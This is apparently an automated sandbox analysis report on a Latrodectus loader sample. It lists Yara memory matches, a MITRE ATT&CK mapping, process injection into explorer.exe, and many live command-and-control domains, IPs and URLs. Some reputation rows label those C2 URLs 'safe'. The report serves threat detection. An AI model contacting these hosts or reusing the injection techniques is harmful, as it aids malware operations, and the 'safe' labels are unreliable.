Source: Yara match | File source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR
Source: Yara match | File source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR
Source: Yara match | File source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

MITRE ATT&CK Matrix (one line per tactic; a number in front of a technique is the count shown beside it in the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 912 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 21 Virtualization/Sandbox Evasion; 912 Process Injection; 1 Obfuscated Files or Information; 1 Regsvr32; 1 Rundll32; 1 DLL Side-Loading; Compile After Delivery; Indicator Removal from Tools; HTML Smuggling; Dynamic API Resolution
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 System Time Discovery; 51 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery; 2 File and Directory Discovery; 13 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID: 1439879, Sample: upfilles.dll.exe, Startdate: 11/05/2024, Architecture: WINDOWS, Score: 100)
  Domains/IPs contacted: workspacin.cloud; boriz400.com; 8 other IPs or domains
  Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Latrodectus; 5 other signatures
  loaddll64.exe (started)
    rundll32.exe (started)
      altynbe.com 138.124.183.215, 443, 49750, 49757 NOKIA-ASFI Norway
      anikvan.com 95.164.68.73, 443, 49754, 49755 NASSIST-ASGI Gibraltar
      3 other IPs or domains
      Signatures: System process connects to network (likely due to code injection or exploit); Injects code into the Windows Explorer (explorer.exe); Sets debug register (to hijack the execution of another thread); 5 other signatures
      explorer.exe (injected)
        workspacin.cloud 104.21.16.155, 443, 49777, 49782 CLOUDFLARENETUS United States
        Signatures: System process connects to network (likely due to code injection or exploit)
        rundll32.exe (started)
        rundll32.exe (started)
    cmd.exe (started)
      rundll32.exe (started)
        Signatures: Contains functionality to inject threads in other processes
    rundll32.exe (started)
      WerFault.exe (started)
    8 other processes
      WerFault.exe (started)
      WerFault.exe (started)
      WerFault.exe (started)

Source | Detection | Scanner | Label | Link
upfilles.dll.dll | 16% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | URL Reputation | safe |
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | 0% | URL Reputation | safe |
https://outlook.com_ | 0% | URL Reputation | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure( | 0% | Avira URL Cloud | safe |
https://altynbe.com/tyk.io | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure4 | 0% | Avira URL Cloud | safe |
https://anikvan.com/content.php | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/ | 0% | Avira URL Cloud | safe |
https://boriz400.com/api/azurey | 0% | Avira URL Cloud | safe |
https://illoskanawer.com/live/ | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure= | 0% | Avira URL Cloud | safe |
https://powerpoint.office.comcember | 0% | URL Reputation | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure | 0% | Avira URL Cloud | safe |
http://schemas.micro | 0% | URL Reputation | safe |
https://altynbe.com/content.php | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpP | 0% | Avira URL Cloud | safe |
https://anikvan.com/I~ | 0% | Avira URL Cloud | safe |
https://anikvan.com/ | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/f | 0% | Avira URL Cloud | safe |
https://boriz400.com/api/azure | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php4 | 0% | Avira URL Cloud | safe |
https://anikvan.com/content.php.f | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1j | 0% | Avira URL Cloud | safe |
https://workspacin.cloud/live/0vaH | 0% | Avira URL Cloud | safe |
https://altynbe.com/U~ | 0% | Avira URL Cloud | safe |
https://workspacin.cloud/live/6 | 0% | Avira URL Cloud | safe |
https://altynbe.com/B_F | 0% | Avira URL Cloud | safe |
https://anikvan.com/content.phpGf | 0% | Avira URL Cloud | safe |
https://altynbe.com/content.php2f | 0% | Avira URL Cloud | safe |
https://anikvan.com/api/azuret.php.f | 0% | Avira URL Cloud | safe |
https://altynbe.com/ | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpL | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.php | 0% | Avira URL Cloud | safe |
https://anikvan.com/d | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1j | 0% | Avira URL Cloud | safe |
https://altynbe.com/api/azureontent.phpMfE | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpA | 0% | Avira URL Cloud | safe |
https://altynbe.com/api/azure | 0% | Avira URL Cloud | safe |
https://workspacin.cloud/live/J5 | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgF | 0% | Avira URL Cloud | safe |
https://boriz400.com/qa | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.php | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&j | 0% | Avira URL Cloud | safe |
https://workspacin.cloud/ | 0% | Avira URL Cloud | safe |
https://boriz400.com/content.php | 0% | Avira URL Cloud | safe |
https://altynbe.com/X | 0% | Avira URL Cloud | safe |
https://altynbe.com/d | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepP | 0% | Avira URL Cloud | safe |
https://anikvan.com/api/azure== | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfE | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjB | 0% | Avira URL Cloud | safe |
https://boriz400.com/ | 0% | Avira URL Cloud | safe |
https://altynbe.com/5~ | 0% | Avira URL Cloud | safe |
https://altynbe.com/api/azureure | 0% | Avira URL Cloud | safe |
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php40%Avira URL Cloudsafe
                      https://altynbe.com/=~0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/n0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&j0%Avira URL Cloudsafe
                      https://workspacin.cloud/live/0%Avira URL Cloudsafe
                      https://anikvan.com/api/azure0%Avira URL Cloudsafe
                      https://altynbe.com/api/azurep0%Avira URL Cloudsafe
Name                                                                        IP               Active   Malicious   Antivirus Detection   Reputation
workspacin.cloud                                                            104.21.16.155    true     true                              unknown
ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com  3.69.236.35      true     false                             high
boriz400.com                                                                91.194.11.183    true     true                              unknown
altynbe.com                                                                 138.124.183.215  true     true                              unknown
anikvan.com                                                                 95.164.68.73     true     true                              unknown
ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com     54.175.181.104   true     false                             high
uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io                               unknown          unknown  false                             unknown
ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io                          unknown          unknown  false                             unknown
Name                                                                    Malicious   Antivirus Detection     Reputation
https://illoskanawer.com/live/                                          true        Avira URL Cloud: safe   unknown
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure         true        Avira URL Cloud: safe   unknown
https://anikvan.com/content.php                                         true        Avira URL Cloud: safe   unknown
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure    true        Avira URL Cloud: safe   unknown
https://altynbe.com/content.php                                         true        Avira URL Cloud: safe   unknown
https://boriz400.com/api/azure                                          true        Avira URL Cloud: safe   unknown
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php  true        Avira URL Cloud: safe   unknown
https://altynbe.com/api/azure                                           true        Avira URL Cloud: safe   unknown
https://boriz400.com/content.php                                        true        Avira URL Cloud: safe   unknown
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php       true        Avira URL Cloud: safe   unknown
https://workspacin.cloud/live/                                          true        Avira URL Cloud: safe   unknown
https://anikvan.com/api/azure                                           true        Avira URL Cloud: safe   unknown
                                                                                  https://anikvan.com/drundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.phprundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://altynbe.com/api/azureontent.phpMfErundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1jrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://outlook.com_explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  low
                                                                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://workspacin.cloud/live/J5explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpArundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgFrundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.phprundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&jrundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://boriz400.com/qarundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://powerpoint.office.comcemberexplorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://workspacin.cloud/explorer.exe, 00000016.00000002.2945734291.000000000C54A000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://altynbe.com/Xrundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepPrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://schemas.microexplorer.exe, 00000016.00000000.1850142884.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.1847476814.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2941807069.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://altynbe.com/drundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://anikvan.com/api/azure==rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmpfalse
